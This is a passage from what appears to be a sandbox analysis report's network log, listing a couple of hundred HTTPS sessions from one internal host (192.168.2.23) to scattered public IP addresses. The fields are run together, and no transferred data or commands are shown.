                                            21451192.168.2.2341342185.65.164.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21452192.168.2.235144894.237.174.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21453192.168.2.2347650107.169.149.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21454192.168.2.2357350120.252.247.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21455192.168.2.235600813.222.85.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21456192.168.2.2349580204.90.127.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21457192.168.2.234868865.146.227.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21458192.168.2.2335098167.252.80.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21459192.168.2.2353018106.149.192.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21460192.168.2.2349428221.210.67.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21461192.168.2.235116882.189.209.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21462192.168.2.235949449.235.61.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21463192.168.2.2334078189.96.68.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21464192.168.2.233725694.164.205.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21465192.168.2.2358954207.132.246.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21466192.168.2.23542449.192.138.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21467192.168.2.234967641.38.198.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21468192.168.2.234685282.96.220.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21469192.168.2.2340264192.198.97.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21470192.168.2.234780236.16.72.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21471192.168.2.2353032139.82.53.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21472192.168.2.234924882.216.182.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21473192.168.2.235812644.235.26.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21474192.168.2.233825032.244.169.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21475192.168.2.2344974126.34.36.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21476192.168.2.2350112163.252.171.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21477192.168.2.235316650.18.54.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21478192.168.2.235363436.174.196.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21479192.168.2.235974482.26.93.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21480192.168.2.2336692166.17.246.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21481192.168.2.235897892.143.139.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21482192.168.2.2338242109.212.32.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21483192.168.2.2355608121.190.52.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21484192.168.2.23371262.85.99.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21485192.168.2.234827475.144.251.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21486192.168.2.23492748.75.243.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21487192.168.2.235216496.22.10.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21488192.168.2.234560066.242.223.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21489192.168.2.2354856158.188.178.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21490192.168.2.2360924199.65.67.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21491192.168.2.2341556183.204.95.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21492192.168.2.2344340119.233.142.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21493192.168.2.2343098156.49.199.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21494192.168.2.2333164130.124.107.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21495192.168.2.233627253.122.122.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21496192.168.2.234460852.127.28.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21497192.168.2.234036635.98.221.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21498192.168.2.2335418120.33.76.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21499192.168.2.233383880.183.205.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21500192.168.2.234870237.183.194.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21501192.168.2.2336254158.218.89.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21502192.168.2.234120663.113.88.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21503192.168.2.2335234171.61.53.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21504192.168.2.234874043.221.207.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21505192.168.2.2354582219.101.182.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21506192.168.2.2357384189.229.198.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21507192.168.2.2345766133.70.91.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21508192.168.2.2352460189.69.14.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21509192.168.2.234174053.58.34.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21510192.168.2.2337924156.230.14.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21511192.168.2.2343666118.216.252.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21512192.168.2.234939271.32.42.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21513192.168.2.2340038110.176.162.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21514192.168.2.234941618.144.221.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21515192.168.2.234890838.108.100.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21516192.168.2.233966612.126.81.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21517192.168.2.2333426124.110.135.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21518192.168.2.235062041.0.57.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21519192.168.2.2334786187.140.82.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21520192.168.2.234284248.244.88.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21521192.168.2.23523084.22.82.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21522192.168.2.2340776159.143.107.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21523192.168.2.235708864.215.102.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21524192.168.2.2337768201.251.159.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21525192.168.2.235290482.79.225.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21526192.168.2.2357424167.215.37.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21527192.168.2.234923457.17.108.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21528192.168.2.234855638.38.18.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21529192.168.2.2337404118.178.32.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21530192.168.2.235414679.195.237.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21531192.168.2.2358766200.20.44.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21532192.168.2.234081413.5.108.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21533192.168.2.234901634.64.178.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21534192.168.2.235256634.53.16.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21535192.168.2.235370213.37.194.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21536192.168.2.2355164193.62.128.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21537192.168.2.2358000201.79.194.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21538192.168.2.23344329.245.83.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21539192.168.2.235711660.125.132.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21540192.168.2.2333100178.107.129.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21541192.168.2.2356832136.170.10.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21542192.168.2.2349262206.203.153.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21543192.168.2.2357648216.65.172.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21544192.168.2.2336308133.159.187.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21545192.168.2.2335552155.33.181.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21546192.168.2.235796648.35.104.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21547192.168.2.2342868109.229.6.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21548192.168.2.2341488193.40.124.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21549192.168.2.2354912179.25.213.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21550192.168.2.235165292.240.146.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21551192.168.2.2351904111.87.74.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21552192.168.2.234947613.43.238.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21553192.168.2.2334740148.33.93.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21554192.168.2.235918237.240.242.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21555192.168.2.23327882.183.70.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21556192.168.2.2343018168.187.97.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21557192.168.2.2334242141.178.237.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21558192.168.2.2335866198.184.168.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21559192.168.2.234220012.187.219.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21560192.168.2.2348814116.235.19.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21561192.168.2.2347368122.201.58.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21562192.168.2.233734051.22.71.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21563192.168.2.233945427.244.119.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21564192.168.2.2354334196.30.28.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21565192.168.2.233386899.54.7.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21566192.168.2.2343708147.73.78.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21567192.168.2.235053864.162.197.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21568192.168.2.2338716191.26.34.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21569192.168.2.233782819.59.241.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21570192.168.2.2333816122.203.243.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21571192.168.2.2353170207.22.230.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21572192.168.2.235377240.91.210.46443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21573192.168.2.236065220.151.35.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21574192.168.2.234029259.53.170.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21575192.168.2.2343198192.5.3.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21576192.168.2.235009493.29.99.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21577192.168.2.233380439.100.32.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21578192.168.2.2357838120.254.41.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21579192.168.2.2357410141.200.76.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21580192.168.2.2334896220.49.47.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21581192.168.2.2357842182.190.205.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21582192.168.2.2359936117.76.157.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21583192.168.2.234512880.241.124.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21584192.168.2.234701234.110.104.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21585192.168.2.2349434132.104.97.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21586192.168.2.233708075.72.222.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21587192.168.2.233532662.235.112.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21588192.168.2.2357370161.147.94.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21589192.168.2.235187444.210.189.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21590192.168.2.2351390153.214.175.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21591192.168.2.2339678166.143.66.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21592192.168.2.2353224178.133.192.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21593192.168.2.2343486120.84.38.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21594192.168.2.2337584176.62.133.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21595192.168.2.234148641.176.162.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21596192.168.2.2333048153.82.132.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21597192.168.2.235704460.6.16.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21598192.168.2.2351294126.201.132.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21599192.168.2.2342466105.242.124.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21600192.168.2.235704282.103.62.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21601192.168.2.2358216111.125.69.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21602192.168.2.2355722167.55.3.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21603192.168.2.234950687.255.147.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21604192.168.2.235050248.112.241.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21605192.168.2.2338886168.11.38.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21606192.168.2.235378648.253.9.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21607192.168.2.2355114160.169.56.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21608192.168.2.233651446.187.91.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21609192.168.2.235642899.178.98.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21610192.168.2.235197254.57.191.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21611192.168.2.2342680143.5.137.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21612192.168.2.2353232156.31.96.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21613192.168.2.2355352205.192.234.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21614192.168.2.2350354184.243.164.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21615192.168.2.2358556210.94.255.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21616192.168.2.2356486144.143.245.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21617192.168.2.2349374168.51.128.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21618192.168.2.2349940179.22.182.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21619192.168.2.2348428105.244.215.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21620192.168.2.235596061.210.172.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21621192.168.2.2360868177.221.41.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21622192.168.2.234406435.139.22.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21623192.168.2.235520450.110.230.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21624192.168.2.2345432201.45.54.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21625192.168.2.235036896.28.177.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21626192.168.2.235799662.187.17.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21627192.168.2.2354670205.128.13.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21628192.168.2.235542839.22.141.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21629192.168.2.2342230177.77.71.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21630192.168.2.2360032166.217.113.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21631192.168.2.234140497.69.92.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21632192.168.2.233586440.240.16.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21633192.168.2.2359658134.215.101.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21634192.168.2.2334560169.18.169.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21635192.168.2.235872881.239.1.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21636192.168.2.2351704178.240.119.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21637192.168.2.235332072.192.61.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21638192.168.2.234193464.186.254.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21639192.168.2.2337526222.69.145.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21640192.168.2.235699627.141.109.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21641192.168.2.2342790138.221.44.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21642192.168.2.2343148151.80.174.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21643192.168.2.23591202.52.120.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21644192.168.2.2339794187.72.92.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21645192.168.2.23430509.35.50.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21646192.168.2.2353306120.211.244.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21647192.168.2.233411868.143.106.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21648192.168.2.235242287.183.254.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21649192.168.2.233443094.94.221.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21650192.168.2.2348364145.223.37.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21651192.168.2.234460698.19.133.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21652192.168.2.2349560155.214.105.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21653192.168.2.2350518203.12.242.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21654192.168.2.2356454124.181.255.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21655192.168.2.235599695.53.201.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21656192.168.2.23455565.122.90.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21657192.168.2.235489834.59.182.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21658192.168.2.233384480.158.22.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21659192.168.2.2352880189.118.204.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21660192.168.2.234380095.140.210.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21661192.168.2.2357626122.224.32.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21662192.168.2.234883073.230.3.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21663192.168.2.2347138135.211.68.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21664192.168.2.2358246187.180.227.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21665192.168.2.23393189.94.140.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21666192.168.2.2344946211.232.57.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21667192.168.2.234183851.129.120.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21668192.168.2.235314639.20.5.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21669192.168.2.235990270.18.151.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21670192.168.2.2344420195.197.58.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21671192.168.2.2334100222.143.228.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21672192.168.2.2349058191.228.114.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
